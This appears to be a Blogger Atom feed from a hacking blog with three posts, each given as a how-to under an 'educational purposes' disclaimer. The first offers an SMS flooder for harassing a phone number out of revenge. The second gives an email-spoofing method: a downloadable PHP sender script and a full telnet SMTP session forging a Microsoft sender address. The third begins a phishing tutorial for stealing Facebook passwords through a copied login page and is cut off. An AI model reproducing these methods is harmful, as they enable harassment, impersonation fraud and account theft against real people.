<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8758676234514739420</id><updated>2025-08-25T09:55:57.401-07:00</updated><category term="Hacking Software"/><category term="Computer Hack"/><category term="Netbios hacking"/><category term="hacking Commends"/><category term="Send fake"/><category term="Trace IP"/><category term="facebook hacks"/><category term="CCTv hack"/><category term="Hacking Books"/><category term="Hacking News"/><category term="IP Hidening"/><category term="Speedup Soft"/><category term="Usb Hack"/><title type='text'>Hacking Artciles</title><subtitle type='html'>This is only for education purpose.So who ever try this is at his risk. I am not sure that this will work 100%.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default?start-index=26&amp;max-results=25&amp;redirect=false'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>28</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-2586257122416639640</id><published>2011-05-08T01:41:00.000-07:00</published><updated>2011-05-08T01:41:50.177-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Send fake"/><title type='text'>send Fake sms Disturb Any mobile Number</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT-ojbHfXrDgrzuBqzg-JRRdbd5eURec1RnigARGESdxD27KW_hSzMeTvRVtYlIUW82vCxBsh69izUEhaM9E48Kr2T4ndOX2ZJFyOfzTC9fY1CKtm8WpA2L3ytYtVAGA4buhkns5LRT7k/s1600/smscenter.gif&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;313&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT-ojbHfXrDgrzuBqzg-JRRdbd5eURec1RnigARGESdxD27KW_hSzMeTvRVtYlIUW82vCxBsh69izUEhaM9E48Kr2T4ndOX2ZJFyOfzTC9fY1CKtm8WpA2L3ytYtVAGA4buhkns5LRT7k/s320/smscenter.gif&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;Q.Whats a SMS FLOODER??&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;IT SENDS INFINITE SMS TO ANY NUMBER THAT U WANT AS LONG AS U RUN IT.&lt;/b&gt;&lt;/span&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;Q. Whats d use?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;U want to take revenge from some1 or just do it on friends no. for fun.&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif; margin: 0px; padding: 0px;&quot;&gt;domains yahoo&lt;/span&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;HOW TO USE IT:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red; margin: 0px; padding: 0px;&quot;&gt;FireFOx Users&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=5224300743962985284&amp;amp;postID=495054165552002075&quot; id=&quot;AdBriteInlineAd_INSTALL&quot; name=&quot;AdBriteInlineAd_INSTALL&quot; style=&quot;background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-position: 50% 100%; color: #006600; cursor: pointer; margin: 0px 0px -2px; outline-style: none; padding: 0px 0px 2px; text-decoration: none;&quot; target=&quot;_top&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;INSTALL&amp;nbsp;GREASMONKEY&amp;nbsp;&lt;a href=&quot;https://addons.mozilla.org/en-US/firefox/addon/748/&quot; style=&quot;color: #0071bb; margin: 0px; outline-style: none; padding: 0px;&quot;&gt;(Click Here)&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;DEN&amp;nbsp;INSTALL&amp;nbsp;THE SCRIPT THAT I GAVE&lt;/b&gt;&lt;/span&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;THEN GO TO TOOLS/GREASEMONKEY/MANAGE USER SCRIPTS/TEMP&lt;/b&gt;&lt;/span&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;THEN&amp;nbsp;CLICK&amp;nbsp;ON EDIT&lt;/b&gt;&lt;/span&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;THEN&amp;nbsp;BROWSE&amp;nbsp;NOTEPAD C/WINDOWS/NOTEPAD&lt;/b&gt;&lt;/span&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;THEN EDIT THE NUMBER&lt;/b&gt;&lt;/span&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;Goto eezysms.com,&lt;/b&gt;&lt;/span&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: verdana; font-size: 12px; margin: 0px; padding: 0px;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;it will register the&amp;nbsp;mobile&amp;nbsp;no.&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;On the popup that appears&amp;nbsp;click&amp;nbsp;on ok.&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;Sit back and Enjoy!! google adwords&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/2586257122416639640/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/send-fake-sms-disturb-any-mobile-number.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/2586257122416639640'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/2586257122416639640'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/send-fake-sms-disturb-any-mobile-number.html' title='send Fake sms Disturb Any mobile Number'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT-ojbHfXrDgrzuBqzg-JRRdbd5eURec1RnigARGESdxD27KW_hSzMeTvRVtYlIUW82vCxBsh69izUEhaM9E48Kr2T4ndOX2ZJFyOfzTC9fY1CKtm8WpA2L3ytYtVAGA4buhkns5LRT7k/s72-c/smscenter.gif" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-4342318574171659237</id><published>2011-05-08T01:31:00.001-07:00</published><updated>2011-05-08T01:31:27.485-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Send fake"/><title type='text'>How To Send Anonymous Emails</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; class=&quot;aligncenter&quot; height=&quot;262&quot; src=&quot;http://www.gohacking.com/wp-content/uploads/2008/12/email-privacy.jpg&quot; title=&quot;Send Anonymous Emails&quot; width=&quot;279&quot; /&gt;&lt;/div&gt;Most of&amp;nbsp;us are very curious to know a method to &lt;strong&gt;send anonymous emails &lt;/strong&gt;to our friends for fun. But the question is, is it possible to send&amp;nbsp;anonymous emails in spite of the advanced spam filtering&amp;nbsp;technology adopted by email service provides like Gmail, Yahoo etc? The answer is &lt;strong&gt;YES,&lt;/strong&gt; it is still possible to bypass their spam filters and send anonymous emails to your friends. For example, you can send an email to your friend with the following sender details.&lt;br /&gt;
&lt;div class=&quot;stb-info_box&quot; id=&quot;stb-box-3762&quot;&gt;From: &lt;strong&gt;Bill Gates &amp;lt;billg@microsoft.com&amp;gt;&lt;/strong&gt;&lt;/div&gt;The art of sending this kind emails is known as &lt;strong&gt;Email Spoofing&lt;/strong&gt;. In my previous post on How to Send Fake Email&amp;nbsp;I insisted on&amp;nbsp;using your own SMTP server to send anonymous emails. This method used to work successfully in the past, but&amp;nbsp;today it&amp;nbsp;has a very low success rate since Gmail and Yahoo(all major email service providers)&amp;nbsp;blocks the emails that&amp;nbsp;are sent directly from a PC. &lt;strong&gt;In this post I have come up with a new way to send anonymous emails (spoofed emails) that has 100% success rate. &lt;/strong&gt;If you have to successfully send an &lt;strong&gt;anonymous email or spoofed email&lt;/strong&gt;, you should send&amp;nbsp;it&amp;nbsp;using a relay server.&lt;br /&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;strong&gt;What is a Relay Server?&lt;/strong&gt;&lt;br /&gt;
In simple words,&amp;nbsp;a relay server is an &lt;a href=&quot;http://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol&quot; target=&quot;_blank&quot;&gt;SMTP Server&lt;/a&gt;&amp;nbsp;that is trusted by Google or Yahoo&amp;nbsp;as an authorised sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason&amp;nbsp;for which&amp;nbsp;using our own SMTP server&amp;nbsp;to send emails fail.&lt;br /&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;strong&gt;So What’s Next?&lt;/strong&gt;&lt;br /&gt;
Now all we have to do is, find a&lt;strong&gt; trusted SMTP server&lt;/strong&gt; to Send Spoofed Emails. Usually all the emails that are sent from &lt;strong&gt;web hosting providers&lt;/strong&gt; are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free Web Hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the &lt;a href=&quot;http://en.wikipedia.org/wiki/Email#Header&quot; target=&quot;_blank&quot;&gt;email headers&lt;/a&gt; to insert the &lt;strong&gt;spoofed &lt;em&gt;From address&lt;/em&gt;&lt;/strong&gt; field into it.&lt;br /&gt;
I have created a PHP script that allows you &lt;strong&gt;to send emails from any name and email address&lt;/strong&gt; of your choice. Here is a step-by-step procedure to setup your own &lt;strong&gt;Anonymous Email Sender Script&lt;/strong&gt;&lt;br /&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;1. Goto&amp;nbsp;&lt;a href=&quot;http://www.x10hosting.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;X10 Hosting&lt;/strong&gt;&amp;nbsp;&lt;/a&gt;&amp;nbsp;and register a new account.&lt;br /&gt;
2. &lt;a href=&quot;https://rapidshare.com/files/459271683/sendmail_www.julianhakingarticles.co.cc.rar&quot; rel=&quot;nofollow&quot;&gt;&lt;strong&gt;Download&lt;/strong&gt;&lt;/a&gt; my &lt;strong&gt;Anonymous Email Sender Script (sendmail.rar)&lt;/strong&gt;.&lt;br /&gt;
3. &lt;strong&gt;Login&lt;/strong&gt; to your FreeWebHostingArea Account and click on &lt;strong&gt;File Manager&lt;/strong&gt;.&lt;br /&gt;
4. &lt;strong&gt;Upload&lt;/strong&gt; the &lt;strong&gt;sendmail.php, pngimg.php and bg1.PNG&lt;/strong&gt;&amp;nbsp;files to the server.&lt;br /&gt;
5. Set permissions for &lt;strong&gt;sendmail.php, pngimg.php and bg1.PNG&lt;/strong&gt;&amp;nbsp;to &lt;strong&gt;&lt;span style=&quot;color: red;&quot;&gt;777&lt;/span&gt;.&lt;/strong&gt;&lt;br /&gt;
6. Now type the following URL&lt;br /&gt;
&lt;div class=&quot;stb-info_box&quot; id=&quot;stb-box-3741&quot;&gt;http://&lt;strong&gt;yoursite&lt;/strong&gt;.x10hosting.com/sendmail.php&lt;/div&gt;&lt;div class=&quot;stb-warning_box&quot; id=&quot;stb-box-1282&quot;&gt;NOTE: &lt;strong&gt;yoursite&lt;/strong&gt; must be substituted by the name of the &lt;strong&gt;subdomain&lt;/strong&gt; that you have chosen during the registration process.&lt;/div&gt;7. Use the script to send Anonymous Emails. Enjoy!!!&lt;br /&gt;
Tell me whether it worked or not. Please pass your comments…&lt;br /&gt;
&lt;div class=&quot;stb-warning_box&quot; id=&quot;stb-box-3395&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;small&gt;WARNING: ALL THE INFORMATION PROVIDED IN THIS POST&amp;nbsp;ARE FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR ANY MISUSE.&lt;/small&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;stb-warning_box&quot; id=&quot;stb-box-3395&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;small&gt;&amp;nbsp;&lt;/small&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; class=&quot;alignleft&quot; height=&quot;210&quot; src=&quot;http://www.gohacking.com/wp-content/uploads/2008/12/email-privacy.jpg&quot; title=&quot;Send Fake Email&quot; width=&quot;223&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Most of the email forging tutorials on internet will teach us how to send fake email connecting to SMTP server of the ISP or any other domain. But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorised access.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Also many of the websites offer you to send fake email from their sites where none of them work. So we have to run our own SMTP server on our computer to successfully send a fake email. SMTP server is a simple software program which can be installed on your computer in few seconds. SMTP server allows you to send fake email right from your desktop easily and effectively.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;strong&gt;&lt;a href=&quot;http://www.qksoft.com/qk-smtp-server/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Download QK SMTP server HERE&lt;/a&gt;&lt;/strong&gt;. This is the SMTP server i am using in my tutorial. Once you download and install the server on your comp then you are all set to send fake email successfully.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;strong&gt;PART A: CONFIGURING SMTP SERVER&lt;/strong&gt;&lt;br /&gt;
Once you have installed the QK SMTP server on your comp you must perform the following configuration.&lt;br /&gt;
1. Click on “Settings” button on the main screen,the Settings window pops up&lt;br /&gt;
2. On Settings window click on “Basic Parameter” tab&lt;br /&gt;
3. Set binding IP to “127.0.0.1″&lt;br /&gt;
4. Set port to “25″&lt;br /&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;strong&gt;PART B: SENDING FAKE EMAIL (EMAIL FORGING)&lt;/strong&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running). If it is already running then this step can be ignored&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;2. Goto command prompt(Start-Accessories-Command prompt)&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;3. Type exactly as follows&lt;/div&gt;&lt;div class=&quot;stb-info_box&quot; id=&quot;stb-box-8795&quot;&gt;C:\&amp;gt;telnet 127.0.0.1 25&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Here 127.0.0.1 is the default IP of every computer.25 is the port number. SO you are connecting to the SMTP server running on your own computer. This step is very importand to send fake email.&lt;/div&gt;&lt;div class=&quot;stb-warning_box&quot; id=&quot;stb-box-8026&quot;&gt;NOTE: The IP &lt;strong&gt;127.0.0.1&lt;/strong&gt; should not be substituted by any other IP.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Heres the snapshot of what you see after step 3. Click on it to enlarge&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; class=&quot;size-full wp-image-386  aligncenter&quot; height=&quot;257&quot; src=&quot;http://www.gohacking.com/wp-content/uploads/2008/12/qk_smtp-1.jpg&quot; title=&quot;Send fake email using QK SMTP Server&quot; width=&quot;499&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;4. After typing the telnet command in the command prompt you get entry to the server which displays the following message. The response of a OK SMTP server is given below. &lt;span style=&quot;color: #009900;&quot;&gt;Message within&lt;strong&gt; Green&lt;/strong&gt; color is only explanation.&lt;/span&gt;&lt;/div&gt;&lt;strong&gt;220 Welcome to QK SMTP Server 3&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;helo hacker&lt;/strong&gt; &lt;span style=&quot;color: #009900;&quot;&gt;(Type helo &amp;amp; any name followed by space)&lt;/span&gt;&lt;br /&gt;
&lt;strong&gt;250 Hello hacker&lt;/strong&gt; &lt;span style=&quot;color: #009900;&quot;&gt;(Server Welcomes You)&lt;/span&gt;&lt;br /&gt;
&lt;strong&gt;mail from:billg@microsoft.com&lt;/strong&gt; &lt;span style=&quot;color: #009900;&quot;&gt;(email&amp;nbsp;ID can be anything of your choice. This is the ID from which fake email appears to have come from)&lt;br /&gt;
&lt;/span&gt;&lt;strong&gt;250 &lt;/strong&gt;&lt;a href=&quot;mailto:billg@microsoft.com&quot;&gt;&lt;strong&gt;&lt;span style=&quot;color: #005500;&quot;&gt;billg@microsoft.com&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; Address Okay&lt;/strong&gt; &lt;span style=&quot;color: #009900;&quot;&gt;(Server gives a positive response)&lt;br /&gt;
&lt;/span&gt;&lt;strong&gt;rcpt to:admin@gmail.com&lt;/strong&gt; &lt;span style=&quot;color: #009900;&quot;&gt;(Type any valid recipient email address)&lt;br /&gt;
&lt;/span&gt;&lt;strong&gt;250 &lt;/strong&gt;&lt;a href=&quot;mailto:admin@gmail.com&quot;&gt;&lt;strong&gt;&lt;span style=&quot;color: #005500;&quot;&gt;admin@gmail.com&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; Address Okay&lt;/strong&gt; &lt;span style=&quot;color: #009900;&quot;&gt;(Server gives a positive response)&lt;br /&gt;
&lt;/span&gt;&lt;strong&gt;data &lt;/strong&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(type this command to start input data)&lt;br /&gt;
&lt;/span&gt;&lt;strong&gt;354 Please start mail input&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;From:Gates &amp;lt;&lt;/strong&gt;&lt;a href=&quot;mailto:billg@microsoft.com&quot;&gt;&lt;strong&gt;&lt;span style=&quot;color: #005500;&quot;&gt;billg@microsoft.com&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;&amp;gt;&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;To:admin@gmail.com&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;Date:Sat Jan 5,2008 9:45 PM&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;Subject:Test to send fake email&lt;/strong&gt;&lt;br /&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;You can create as many headers followed by the “:” symbol.&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;stb-warning_box&quot; id=&quot;stb-box-1740&quot;&gt;NOTE: HEADERS SHOULD NOT CONTAIN A LINE GAP. IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header &amp;amp; body data&lt;/div&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;lt;HERE IS YOUR DATA&amp;gt;&lt;span style=&quot;color: #009900;&quot;&gt;End the body of email by pressing [ENTER] .(dot) [ENTER]&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;strong&gt;250 Mail queued for delivery&lt;/strong&gt;&lt;span style=&quot;color: #ffff99;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(Sever indicates that the email is ready for sending)&lt;br /&gt;
&lt;/span&gt;&lt;strong&gt;quit &lt;/strong&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(Type this command to quit from server)&lt;br /&gt;
&lt;/span&gt;&lt;strong&gt;221 Closing connection. Good bye.&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;Connection to host lost&lt;/strong&gt;&lt;br /&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;(You will get the above 2 lines of message after typing “quit” command)&lt;br /&gt;
(Your fake email is sent to the recipient)&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;&lt;span style=&quot;color: white;&quot;&gt;*****&lt;/span&gt;&lt;span style=&quot;color: white;&quot;&gt;END OF EMAIL FORGING*****&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Here’s the screenshot for your convenience&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; class=&quot;size-full wp-image-387 aligncenter&quot; height=&quot;300&quot; src=&quot;http://www.gohacking.com/wp-content/uploads/2008/12/qk_smtp2.jpg&quot; title=&quot;Fake email delivered&quot; width=&quot;500&quot; /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/4342318574171659237/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/how-to-send-anonymous-emails.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/4342318574171659237'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/4342318574171659237'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/how-to-send-anonymous-emails.html' title='How To Send Anonymous Emails'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-3045068357415030698</id><published>2011-05-08T01:27:00.001-07:00</published><updated>2011-05-08T01:27:57.685-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="facebook hacks"/><title type='text'>How to hack Facbook account password by phishing.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;In this tutorial we will discus how you can &lt;i&gt;&lt;u&gt;&lt;b&gt;hack Facbook account&lt;/b&gt;&lt;/u&gt;&lt;/i&gt; password by phishing. Phishing is act of creating a replica of legitimate website for stealing passwords and credit card numbers etc. Here I will show you how you can create replica of facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password&lt;/span&gt;&lt;br /&gt;
